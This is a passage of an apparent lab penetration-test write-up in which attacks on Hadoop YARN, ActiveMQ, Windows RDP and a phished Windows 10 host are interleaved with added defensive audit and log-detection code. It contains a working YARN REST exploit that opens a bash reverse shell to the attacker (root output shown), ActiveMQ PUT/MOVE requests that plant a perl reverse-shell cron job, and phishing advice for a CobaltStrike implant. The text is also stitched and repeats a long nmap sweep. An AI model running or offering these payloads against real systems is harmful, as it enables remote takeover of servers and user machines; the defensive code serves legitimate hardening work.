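Not shown: 998 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
8088/tcp open  radan-http

Nmap scan report for 10.211.55.7
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.7 are filtered

Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.0011s latency).
Not shown: 991 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
"""

# Constructed sample: the same host before and after Remote Desktop was switched on.
BEFORE_8 = """\
Nmap scan report for windows-7sp1.shared (10.211.55.8)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
"""
AFTER_8 = BEFORE_8.replace("445/tcp   open  microsoft-ds\n",
                           "445/tcp   open  microsoft-ds\n3389/tcp  open  ms-wbt-server\n")

if __name__ == "__main__":
    print("hosts with open ports:", hosts_with_open_ports(SWEEP))
    print("newly opened:", new_open_ports(BEFORE_8, AFTER_8))
```

The diff is the defender's view of the wmic change above: a scheduled rescan of a baseline, run with the same port list, turns a quietly enabled RDP listener into an alert instead of something found only when the attacker logs in.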

Once port 3389 is open, use the captured password to log in remotely.

Successfully logged in to the Windows 7 SP1 system.

10.211.55.6 is Ubuntu Linux

Its open ports are:

PORT      STATE SERVICE
22/tcp    open  ssh
8088/tcp  open  radan-http
8161/tcp  open  patrol-snmp
61616/tcp open  unknown

Port 8088 is a web application; opening it in a browser reveals a Hadoop instance that allows unauthenticated access.

This unauthenticated Hadoop access can be used to obtain control of the server.

Reverse shell exploit

# _*_ coding utf-8 _*_
# author:return0;
import requests

target = 'http://10.211.55.6:8088/'  # IP address of the target host
lhost = '192.168.1.2'  # address of the attacking machine; it listens on port 8888

# Step 1: ask the ResourceManager REST API for a new application id
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']

# Step 2: submit an application whose ApplicationMaster command is the reverse shell
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/8888 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

Listen on port 8888

(base) ➜ ~ nc -l 8888
bash: cannot set terminal process group (211): Inappropriate ioctl for device
bash: no job control in this shell
<33412_0001/container_1596872533412_0001_01_000001# whoami
whoami
root
<33412_0001/container_1596872533412_0001_01_000001# ifconfig
ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:ac:1a:00:02  
          inet addr:172.26.0.2  Bcast:172.26.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:17365 errors:0 dropped:0 overruns:0 frame:0
          TX packets:34456 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1858357 (1.7 MiB)  TX bytes:5760591 (5.4 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:8 errors:0 dropped:0 overruns:0 frame:0
          TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:647 (647.0 B)  TX bytes:647 (647.0 B)

<33412_0001/container_1596872533412_0001_01_000001# id
id
uid=0(root) gid=0(root) groups=0(root)
<33412_0001/container_1596872533412_0001_01_000001#

Control of the Ubuntu Linux server has been obtained.
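The ResourceManager accepted the application submission above because the cluster ran with Hadoop's default "simple" authentication, in which the REST API trusts whatever user name the caller claims and the web port needs no login at all. As an added example (not from the original post or the Hadoop project), the following Python reads the text of core-site.xml and yarn-site.xml and reports the settings that leave port 8088 open in this way, showing a stock single-node configuration beside a hardened one. The property names are standard Hadoop keys and the defaults used for absent keys are Hadoop's documented defaults; the two configuration documents are constructed samples.

```python
"""Audit of Hadoop/YARN XML configuration for unauthenticated REST access
(added example, not from the post or the Hadoop project)."""
import xml.etree.ElementTree as ET
from typing import Dict, List

def load_props(xml_text: str) -> Dict[str, str]:
    """Flatten a Hadoop <configuration> document into {name: value}."""
    root = ET.fromstring(xml_text)
    props: Dict[str, str] = {}
    for prop in root.iter("property"):
        name = prop.findtext("name")
        if name:
            props[name.strip()] = (prop.findtext("value") or "").strip()
    return props

def audit_yarn_exposure(core_site: str, yarn_site: str) -> List[str]:
    """Return human-readable findings; an empty list means no weak setting was seen."""
    core, yarn = load_props(core_site), load_props(yarn_site)
    findings: List[str] = []
    if core.get("hadoop.security.authentication", "simple") != "kerberos":
        findings.append("hadoop.security.authentication != kerberos: callers are trusted by claimed user name")
    if core.get("hadoop.http.authentication.type", "simple") != "kerberos":
        findings.append("hadoop.http.authentication.type != kerberos: web UI and REST API need no login")
    if core.get("hadoop.http.authentication.simple.anonymous.allowed", "true") == "true":
        findings.append("hadoop.http.authentication.simple.anonymous.allowed=true: anonymous HTTP requests accepted")
    if yarn.get("yarn.acl.enable", "false") != "true":
        findings.append("yarn.acl.enable=false: no ACL check on who may submit or kill applications")
    # Effective default is ${yarn.resourcemanager.hostname}:8088 with hostname 0.0.0.0.
    webapp = yarn.get("yarn.resourcemanager.webapp.address",
                      yarn.get("yarn.resourcemanager.hostname", "0.0.0.0") + ":8088")
    if webapp.startswith("0.0.0.0"):
        findings.append(f"ResourceManager web app listens on all interfaces ({webapp})")
    return findings

def _conf(pairs: Dict[str, str]) -> str:
    """Build a Hadoop-style configuration document from name/value pairs."""
    body = "".join(f"<property><name>{k}</name><value>{v}</value></property>"
                   for k, v in pairs.items())
    return f'<?xml version="1.0"?><configuration>{body}</configuration>'

# Constructed: a stock single-node setup like the one behind port 8088 above.
WEAK_CORE = _conf({"fs.defaultFS": "hdfs://localhost:9000"})
WEAK_YARN = _conf({"yarn.nodemanager.aux-services": "mapreduce_shuffle"})

# Constructed: the same cluster with Kerberos, ACLs and a bound web address.
HARDENED_CORE = _conf({
    "fs.defaultFS": "hdfs://rm.internal:9000",
    "hadoop.security.authentication": "kerberos",
    "hadoop.security.authorization": "true",
    "hadoop.http.authentication.type": "kerberos",
    "hadoop.http.authentication.simple.anonymous.allowed": "false",
})
HARDENED_YARN = _conf({
    "yarn.resourcemanager.hostname": "rm.internal",
    "yarn.resourcemanager.webapp.address": "rm.internal:8088",
    "yarn.acl.enable": "true",
    "yarn.admin.acl": "yarn",
})

if __name__ == "__main__":
    for label, core, yarn in (("weak", WEAK_CORE, WEAK_YARN),
                              ("hardened", HARDENED_CORE, HARDENED_YARN)):
        print(label, audit_yarn_exposure(core, yarn))
```

Binding the web app to an internal address and enabling ACLs narrow the exposure, but only Kerberos authentication on both the RPC and HTTP layers actually removes the "anyone can submit a container command" condition that the exploit relies on; on a network like the one in this post, a host firewall rule restricting 8088 to the cluster's own nodes is the quickest stopgap.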


The host also has port 8161 open; opening it in a browser shows that it is the ActiveMQ component, which has an arbitrary file write vulnerability.

PUT /fileserver/1.txt HTTP/1.1
Host: 10.211.55.6:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 249

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.1.2";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
##

Use BurpSuite to intercept the page request, modify the packet to write the payload, and replay it; a 204 response means the write succeeded.

Move the uploaded payload file into place

MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root/1.txt
Host: 10.211.55.6:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 6

test

Listen on the port and wait for the shell to connect back.
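From the server side, the attack above is two requests to the web console port: a PUT that stores a file under /fileserver/ and a MOVE that relocates it, with a 204 on each marking success. As an added example (not from the original post or the ActiveMQ project), the following Python scans request-log lines for that pattern. It assumes the console's Jetty, or a reverse proxy in front of it, writes an NCSA common-format access log; the log lines are constructed samples. Any write-class method aimed at /fileserver/ raises an alert, and a 2xx response is rated high because it means the file operation went through.

```python
"""Detection of write requests to the ActiveMQ fileserver servlet in an
NCSA common-format request log (added example, not from the post)."""
import re
from typing import Dict, List, Optional

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Methods that create, rename or remove files on a WebDAV-style file servlet.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE"}
WATCHED_PREFIX = "/fileserver/"

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one access-log record into fields, or None if it is not a request record."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(rec: Dict[str, str]) -> Optional[str]:
    """'high' for a successful write to the file servlet, 'medium' for a
    rejected attempt, None for anything else."""
    if rec["method"] not in WRITE_METHODS or not rec["path"].startswith(WATCHED_PREFIX):
        return None
    return "high" if rec["status"].startswith("2") else "medium"

def detect_fileserver_writes(lines: List[str]) -> List[Dict[str, str]]:
    """Return one alert record (log fields plus severity) per matching request."""
    alerts: List[Dict[str, str]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        severity = classify(rec)
        if severity:
            alerts.append({**rec, "severity": severity})
    return alerts

# Constructed sample log: a console login attempt, a directory listing, the
# PUT/MOVE pair from the write-up, a rejected write from another client, and noise.
SAMPLE_LOG = [
    '10.211.55.20 - - [08/Aug/2020:20:31:02 +0800] "GET /admin/ HTTP/1.1" 401 0',
    '10.211.55.20 - - [08/Aug/2020:20:31:40 +0800] "GET /fileserver/ HTTP/1.1" 200 1532',
    '10.211.55.20 - - [08/Aug/2020:20:32:05 +0800] "PUT /fileserver/1.txt HTTP/1.1" 204 0',
    '10.211.55.20 - - [08/Aug/2020:20:32:09 +0800] "MOVE /fileserver/1.txt HTTP/1.1" 204 0',
    '10.211.55.21 - - [08/Aug/2020:20:35:00 +0800] "PUT /fileserver/x.jsp HTTP/1.1" 403 0',
    'garbage line that is not a request record',
]

if __name__ == "__main__":
    for alert in detect_fileserver_writes(SAMPLE_LOG):
        print(alert["severity"], alert["src"], alert["method"], alert["path"], alert["status"])
```

The Destination header that carries the real target path is not recorded in a common-format log, so a MOVE alert should be followed up on the host itself (new files under /etc/cron.d or other root-writable locations, and cron activity). The durable fix is to remove the fileserver web application from the broker's Jetty configuration, since the broker does not need it; later ActiveMQ 5.x releases no longer ship it.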


For Windows 10, a CobaltStrike-generated implant and social engineering are needed to lure the user into running it.

Start the CobaltStrike server

Start the client

Disguise the generated implant and send the client a phishing e-mail.

Phishing e-mail subject: it has to fit the client's line of business; don't send something that makes no sense for them. If they are in the energy business and you send an e-mail about power-grid business, it will not get opened. The generated implant also needs AV evasion work, which will be covered next time.



Privilege escalation

Penetration test log

Port scan

Last login: Sat Aug 8 18:51:00 on ttys001
(base) ➜ ~ Nmap -Pn 10.211.55.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:26 CST
Nmap scan report for 10.211.55.0
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.0 are filtered

Nmap scan report for 10.211.55.1
Host is up.
All 1000 scanned ports on 10.211.55.1 are filtered

Nmap scan report for 10.211.55.2
Host is up (0.0013s latency).
All 1000 scanned ports on 10.211.55.2 are closed

Nmap scan report for 10.211.55.3
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.3 are filtered

Nmap scan report for 10.211.55.4
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.4 are filtered

Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00068s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.00085s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
8088/tcp open  radan-http

Nmap scan report for 10.211.55.7
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.7 are filtered

Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.0011s latency).
Not shown: 991 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap scan report for 10.211.55.9
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.9 are filtered

Nmap scan report for 10.211.55.10
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.10 are filtered

Nmap scan report for 10.211.55.11
Host is up (0.000026s latency).
All 1000 scanned ports on 10.211.55.11 are filtered

Nmap scan report for 10.211.55.12
Host is up (0.000029s latency).
All 1000 scanned ports on 10.211.55.12 are filtered

Nmap scan report for 10.211.55.13
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.13 are filtered

Nmap scan report for 10.211.55.14
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.14 are filtered

Nmap scan report for 10.211.55.15
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.15 are filtered

Nmap scan report for 10.211.55.16
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.16 are filtered

Nmap scan report for 10.211.55.17
Host is up (0.000027s latency).
All 1000 scanned ports on 10.211.55.17 are filtered

Nmap scan report for 10.211.55.18
Host is up (0.000027s latency).
All 1000 scanned ports on 10.211.55.18 are filtered

Nmap scan report for 10.211.55.19
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.19 are filtered

Nmap scan report for 10.211.55.20
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.20 are filtered

Nmap scan report for 10.211.55.21
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.21 are filtered

Nmap scan report for 10.211.55.22
Host is up (0.000017s latency).
All 1000 scanned ports on 10.211.55.22 are filtered

Nmap scan report for 10.211.55.23
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.23 are filtered

Nmap scan report for 10.211.55.24
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.24 are filtered

Nmap scan report for 10.211.55.25
Host is up (0.000019s latency).
All 1000 scanned ports on 10.211.55.25 are filtered

Nmap scan report for 10.211.55.26
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.26 are filtered

Nmap scan report for 10.211.55.27
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.27 are filtered

Nmap scan report for 10.211.55.28
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.28 are filtered

Nmap scan report for 10.211.55.29
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.29 are filtered

Nmap scan report for 10.211.55.30
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.30 are filtered

Nmap scan report for 10.211.55.31
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.31 are filtered

Nmap scan report for 10.211.55.32
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.32 are filtered

Nmap scan report for 10.211.55.33
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.33 are filtered

Nmap scan report for 10.211.55.34
Host is up (0.000017s latency).
All 1000 scanned ports on 10.211.55.34 are filtered

Nmap scan report for 10.211.55.35
Host is up (0.000019s latency).
All 1000 scanned ports on 10.211.55.35 are filtered

Nmap scan report for 10.211.55.36
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.36 are filtered

Nmap scan report for 10.211.55.37
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.37 are filtered

Nmap scan report for 10.211.55.38
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.38 are filtered

Nmap scan report for 10.211.55.39
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.39 are filtered

Nmap scan report for 10.211.55.40
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.40 are filtered

Nmap scan report for 10.211.55.41
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.41 are filtered

Nmap scan report for 10.211.55.42
Host is up (0.000017s latency).
All 1000 scanned ports on 10.211.55.42 are filtered

Nmap scan report for 10.211.55.43
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.43 are filtered

Nmap scan report for 10.211.55.44
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.44 are filtered

Nmap scan report for 10.211.55.45
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.45 are filtered

Nmap scan report for 10.211.55.46
Host is up (0.000017s latency).
All 1000 scanned ports on 10.211.55.46 are filtered

Nmap scan report for 10.211.55.47
Host is up (0.000035s latency).
All 1000 scanned ports on 10.211.55.47 are filtered

Nmap scan report for 10.211.55.48
Host is up (0.000029s latency).
All 1000 scanned ports on 10.211.55.48 are filtered

Nmap scan report for 10.211.55.49
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.49 are filtered

Nmap scan report for 10.211.55.50
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.50 are filtered

Nmap scan report for 10.211.55.51
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.51 are filtered

Nmap scan report for 10.211.55.52
Host is up (0.000016s latency).
All 1000 scanned ports on 10.211.55.52 are filtered

Nmap scan report for 10.211.55.53
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.53 are filtered

Nmap scan report for 10.211.55.54
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.54 are filtered

Nmap scan report for 10.211.55.55
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.55 are filtered

Nmap scan report for 10.211.55.56
Host is up (0.000017s latency).
All 1000 scanned ports on 10.211.55.56 are filtered

Nmap scan report for 10.211.55.57
Host is up (0.000028s latency).
All 1000 scanned ports on 10.211.55.57 are filtered

Nmap scan report for 10.211.55.58
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.58 are filtered

Nmap scan report for 10.211.55.59
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.59 are filtered

Nmap scan report for 10.211.55.60
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.60 are filtered

Nmap scan report for 10.211.55.61
Host is up (0.000035s latency).
All 1000 scanned ports on 10.211.55.61 are filtered

Nmap scan report for 10.211.55.62
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.62 are filtered

Nmap scan report for 10.211.55.63
Host is up (0.000026s latency).
All 1000 scanned ports on 10.211.55.63 are filtered

Nmap scan report for 10.211.55.64
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.64 are filtered

Nmap scan report for 10.211.55.65
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.65 are filtered

Nmap scan report for 10.211.55.66
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.66 are filtered

Nmap scan report for 10.211.55.67
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.67 are filtered

Nmap scan report for 10.211.55.68
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.68 are filtered

Nmap scan report for 10.211.55.69
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.69 are filtered

Nmap scan report for 10.211.55.70
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.70 are filtered

Nmap scan report for 10.211.55.71
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.71 are filtered

Nmap scan report for 10.211.55.72
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.72 are filtered

Nmap scan report for 10.211.55.73
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.73 are filtered

Nmap scan report for 10.211.55.74
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.74 are filtered

Nmap scan report for 10.211.55.75
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.75 are filtered

Nmap scan report for 10.211.55.76
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.76 are filtered

Nmap scan report for 10.211.55.77
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.77 are filtered

Nmap scan report for 10.211.55.78
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.78 are filtered

Nmap scan report for 10.211.55.79
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.79 are filtered

Nmap scan report for 10.211.55.80
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.80 are filtered

Nmap scan report for 10.211.55.81
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.81 are filtered

Nmap scan report for 10.211.55.82
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.82 are filtered

Nmap scan report for 10.211.55.83
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.83 are filtered

Nmap scan report for 10.211.55.84
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.84 are filtered

Nmap scan report for 10.211.55.85
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.85 are filtered

Nmap scan report for 10.211.55.86
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.86 are filtered

Nmap scan report for 10.211.55.87
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.87 are filtered

Nmap scan report for 10.211.55.88
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.88 are filtered

Nmap scan report for 10.211.55.89
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.89 are filtered

Nmap scan report for 10.211.55.90
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.90 are filtered

Nmap scan report for 10.211.55.91
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.91 are filtered

Nmap scan report for 10.211.55.92
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.92 are filtered

Nmap scan report for 10.211.55.93
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.93 are filtered

Nmap scan report for 10.211.55.94
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.94 are filtered

Nmap scan report for 10.211.55.95
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.95 are filtered

Nmap scan report for 10.211.55.96
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.96 are filtered

Nmap scan report for 10.211.55.97
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.97 are filtered

Nmap scan report for 10.211.55.98
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.98 are filtered

Nmap scan report for 10.211.55.99
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.99 are filtered

Nmap scan report for 10.211.55.100
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.100 are filtered

Nmap scan report for 10.211.55.101
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.101 are filtered

Nmap scan report for 10.211.55.102
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.102 are filtered

Nmap scan report for 10.211.55.103
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.103 are filtered

Nmap scan report for 10.211.55.104
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.104 are filtered

Nmap scan report for 10.211.55.105
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.105 are filtered

Nmap scan report for 10.211.55.106
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.106 are filtered

Nmap scan report for 10.211.55.107
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.107 are filtered

Nmap scan report for 10.211.55.108
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.108 are filtered

Nmap scan report for 10.211.55.109
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.109 are filtered

Nmap scan report for 10.211.55.110
Host is up (0.000026s latency).
All 1000 scanned ports on 10.211.55.110 are filtered

Nmap scan report for 10.211.55.111
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.111 are filtered

Nmap scan report for 10.211.55.112
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.112 are filtered

Nmap scan report for 10.211.55.113
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.113 are filtered

Nmap scan report for 10.211.55.114
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.114 are filtered

Nmap scan report for 10.211.55.115
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.115 are filtered

Nmap scan report for 10.211.55.116
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.116 are filtered

Nmap scan report for 10.211.55.117
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.117 are filtered

Nmap scan report for 10.211.55.118
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.118 are filtered

Nmap scan report for 10.211.55.119
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.119 are filtered

Nmap scan report for 10.211.55.120
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.120 are filtered

Nmap scan report for 10.211.55.121
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.121 are filtered

Nmap scan report for 10.211.55.122
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.122 are filtered

Nmap scan report for 10.211.55.123
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.123 are filtered

Nmap scan report for 10.211.55.124
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.124 are filtered

Nmap scan report for 10.211.55.125
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.125 are filtered

Nmap scan report for 10.211.55.126
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.126 are filtered

Nmap scan report for 10.211.55.127
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.127 are filtered

Nmap scan report for 10.211.55.128
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.128 are filtered

Nmap scan report for 10.211.55.129
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.129 are filtered
Nmap scan report for 10.211.55.130Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.130 are filtered
Nmap scan report for 10.211.55.131Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.131 are filtered
Nmap scan report for 10.211.55.132Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.132 are filtered
Nmap scan report for 10.211.55.133Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.133 are filtered
Nmap scan report for 10.211.55.134Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.134 are filtered
Nmap scan report for 10.211.55.135Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.135 are filtered
Nmap scan report for 10.211.55.136Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.136 are filtered
Nmap scan report for 10.211.55.137Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.137 are filtered
Nmap scan report for 10.211.55.138Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.138 are filtered
Nmap scan report for 10.211.55.139Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.139 are filtered
Nmap scan report for 10.211.55.140Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.140 are filtered
Nmap scan report for 10.211.55.141Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.141 are filtered
Nmap scan report for 10.211.55.142Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.142 are filtered
Nmap scan report for 10.211.55.143Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.143 are filtered
Nmap scan report for 10.211.55.144Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.144 are filtered
Nmap scan report for 10.211.55.145Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.145 are filtered
Nmap scan report for 10.211.55.146Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.146 are filtered
Nmap scan report for 10.211.55.147Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.147 are filtered
Nmap scan report for 10.211.55.148Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.148 are filtered
Nmap scan report for 10.211.55.149Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.149 are filtered
Nmap scan report for 10.211.55.150Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.150 are filtered
Nmap scan report for 10.211.55.151Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.151 are filtered
Nmap scan report for 10.211.55.152Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.152 are filtered
Nmap scan report for 10.211.55.153Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.153 are filtered
Nmap scan report for 10.211.55.154Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.154 are filtered
Nmap scan report for 10.211.55.155Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.155 are filtered
Nmap scan report for 10.211.55.156Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.156 are filtered
Nmap scan report for 10.211.55.157Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.157 are filtered
Nmap scan report for 10.211.55.158Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.158 are filtered
Nmap scan report for 10.211.55.159Host is up (0.000029s latency).All 1000 scanned ports on 10.211.55.159 are filtered
Nmap scan report for 10.211.55.160Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.160 are filtered
Nmap scan report for 10.211.55.161Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.161 are filtered
